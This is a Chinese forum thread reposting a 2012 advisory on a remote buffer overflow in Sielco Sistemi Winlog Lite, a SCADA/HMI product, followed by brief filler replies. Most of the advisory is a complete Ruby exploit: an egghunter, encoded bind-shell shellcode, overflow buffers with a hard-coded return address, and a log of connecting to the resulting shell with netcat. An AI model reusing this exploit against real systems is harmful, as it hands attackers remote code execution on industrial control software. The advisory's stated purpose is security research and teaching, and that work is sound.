查看: 2161|回复: 25

Sielco Sistemi Winlog Lite缓冲区溢出漏洞

[复制链接]
发表于 2012-10-30 18:10:27 | 显示全部楼层 |阅读模式
发布日期:2012-06-05
更新日期:2012-06-11
受影响系统:
sielcosistemi SIELCO SISTEMI Winlog Lite 2.07.14
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 53811
Winlog Lite是Sielco Sistemi提供的入门级SCADA/HMI软件Winlog Pro,评估软件包的可能性和简单性,也是创建小型管理应用的解决方案。
Winlog Lite在实现上存在远程缓冲区溢出漏洞,攻击者可利用此漏洞执行任意代码。
<*来源:m1k3 (m1k3@s3cur1ty_de
  
  链接:http://www.securityfocus.com/archive/1/522974
        http://www.linuxidc.com/Linux/2012-06/62642.htm
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
m1k3 ()提供了如下测试方法:
# - Exploit:
#root@bt:~/msf-scripts# ruby runtime-exploit-01.rb
#placing the shellcode
#sleeping ...
#kicking ...
#buffer length: 261
#root@bt:~/msf-scripts# netcat -v 10.8.28.37 4444
#10.8.28.37: inverse host lookup failed: Unknown server error : Connection timed out
#(UNKNOWN) [10.8.28.37] 4444 (?) open
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:\Documents and Settings\All Users\Application Data\Winlog Lite\Projects\Ceramics Kiln\Template>
#
# Important:
# -> the reliability of your exploit depends on that path ...
# if you choose another default project or you start another project this path ist not reliable anymore
# you can choose the default project on the installation. I have used Ceramics Kiln
require 'socket'
port = "46824"
host = "10.8.28.37"
s = TCPSocket.open(host,port)
sleep(0.5)
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter << "\xef\xb8\x77\x6f\x6f\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
#msfpayload windows/shell_bind_tcp R | msfencode -t ruby
#
  • x86/shikata_ga_nai succeeded with size 368 (iteration=1)
    shellcode =
    "\xdb\xc8\xd9\x74\x24\xf4\x5b\xba\x45\x76\x08\xf1\x33\xc9" +
    "\xb1\x56\x31\x53\x18\x83\xeb\xfc\x03\x53\x51\x94\xfd\x0d" +
    "\xb1\xd1\xfe\xed\x41\x82\x77\x08\x70\x90\xec\x58\x20\x24" +
    "\x66\x0c\xc8\xcf\x2a\xa5\x5b\xbd\xe2\xca\xec\x08\xd5\xe5" +
    "\xed\xbc\xd9\xaa\x2d\xde\xa5\xb0\x61\x00\x97\x7a\x74\x41" +
    "\xd0\x67\x76\x13\x89\xec\x24\x84\xbe\xb1\xf4\xa5\x10\xbe" +
    "\x44\xde\x15\x01\x30\x54\x17\x52\xe8\xe3\x5f\x4a\x83\xac" +
    "\x7f\x6b\x40\xaf\xbc\x22\xed\x04\x36\xb5\x27\x55\xb7\x87" +
    "\x07\x3a\x86\x27\x8a\x42\xce\x80\x74\x31\x24\xf3\x09\x42" +
    "\xff\x89\xd5\xc7\xe2\x2a\x9e\x70\xc7\xcb\x73\xe6\x8c\xc0" +
    "\x38\x6c\xca\xc4\xbf\xa1\x60\xf0\x34\x44\xa7\x70\x0e\x63" +
    "\x63\xd8\xd5\x0a\x32\x84\xb8\x33\x24\x60\x65\x96\x2e\x83" +
    "\x72\xa0\x6c\xcc\xb7\x9f\x8e\x0c\xdf\xa8\xfd\x3e\x40\x03" +
    "\x6a\x73\x09\x8d\x6d\x74\x20\x69\xe1\x8b\xca\x8a\x2b\x48" +
    "\x9e\xda\x43\x79\x9e\xb0\x93\x86\x4b\x16\xc4\x28\x23\xd7" +
    "\xb4\x88\x93\xbf\xde\x06\xcc\xa0\xe0\xcc\x7b\xe7\x2e\x34" +
    "\x28\x80\x52\xca\xdf\x0c\xda\x2c\xb5\xbc\x8a\xe7\x21\x7f" +
    "\xe9\x3f\xd6\x80\xdb\x13\x4f\x17\x53\x7a\x57\x18\x64\xa8" +
    "\xf4\xb5\xcc\x3b\x8e\xd5\xc8\x5a\x91\xf3\x78\x14\xaa\x94" +
    "\xf3\x48\x79\x04\x03\x41\xe9\xa5\x96\x0e\xe9\xa0\x8a\x98" +
    "\xbe\xe5\x7d\xd1\x2a\x18\x27\x4b\x48\xe1\xb1\xb4\xc8\x3e" +
    "\x02\x3a\xd1\xb3\x3e\x18\xc1\x0d\xbe\x24\xb5\xc1\xe9\xf2" +
    "\x63\xa4\x43\xb5\xdd\x7e\x3f\x1f\x89\x07\x73\xa0\xcf\x07" +
    "\x5e\x56\x2f\xb9\x37\x2f\x50\x76\xd0\xa7\x29\x6a\x40\x47" +
    "\xe0\x2e\x70\x02\xa8\x07\x19\xcb\x39\x1a\x44\xec\x94\x59" +
    "\x71\x6f\x1c\x22\x86\x6f\x55\x27\xc2\x37\x86\x55\x5b\xd2" +
    "\xa8\xca\x5c\xf7"
    puts "placing the shellcode"
    buffer = "\x41" * 2000
    buffer << "wootwoot" #egg
    buffer << "\x90"
    buffer << shellcode
    buffer << "\x90" * 2000
    print "buffer length: #{buffer.length}\r\n"
    s.puts(buffer)
    puts "sleeping ..."
    sleep(5)
    puts "kicking ..."
    buffer = "\x41" * 20 + "\x14" * 10 + "\x41" * 167
    buffer << "\xdf\x53\x51\x40" #EIP -> Jmp ESP - Vclx40.bpl - 0x405153df
    buffer << "\x90"
    buffer << egghunter
    buffer << "\x90" * (59 - egghunter.length)
    print "buffer length: #{buffer.length}\r\n"
    s.puts(buffer)
    建议:
    --------------------------------------------------------------------------------
    厂商补丁:
    sielcosistemi
    -------------
    目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
    http://www.sielcosistemi.com/en/download/public/winlog_lite.html
  • 发表于 2012-11-3 12:41:17 | 显示全部楼层
    也许似乎大概是,然而未必不见得。  
    发表于 2012-11-8 02:23:34 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    发表于 2012-11-10 03:22:25 | 显示全部楼层
    帮你项项吧  
    发表于 2014-11-4 21:40:17 | 显示全部楼层
    人之所以能,是相信能。  
    发表于 2014-11-17 17:09:03 | 显示全部楼层
    既然来了,就留个脚印  
    发表于 2014-12-5 03:37:19 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    发表于 2014-12-28 09:18:18 | 显示全部楼层
    终于看完了~~~  
    发表于 2015-1-28 05:14:28 | 显示全部楼层
    世界上那些最容易的事情中,拖延时间最不费力。  
    发表于 2015-3-2 03:23:40 | 显示全部楼层
    楼上的话等于没说~~~  
    高级模式
    B Color Image Link Quote Code Smilies

    本版积分规则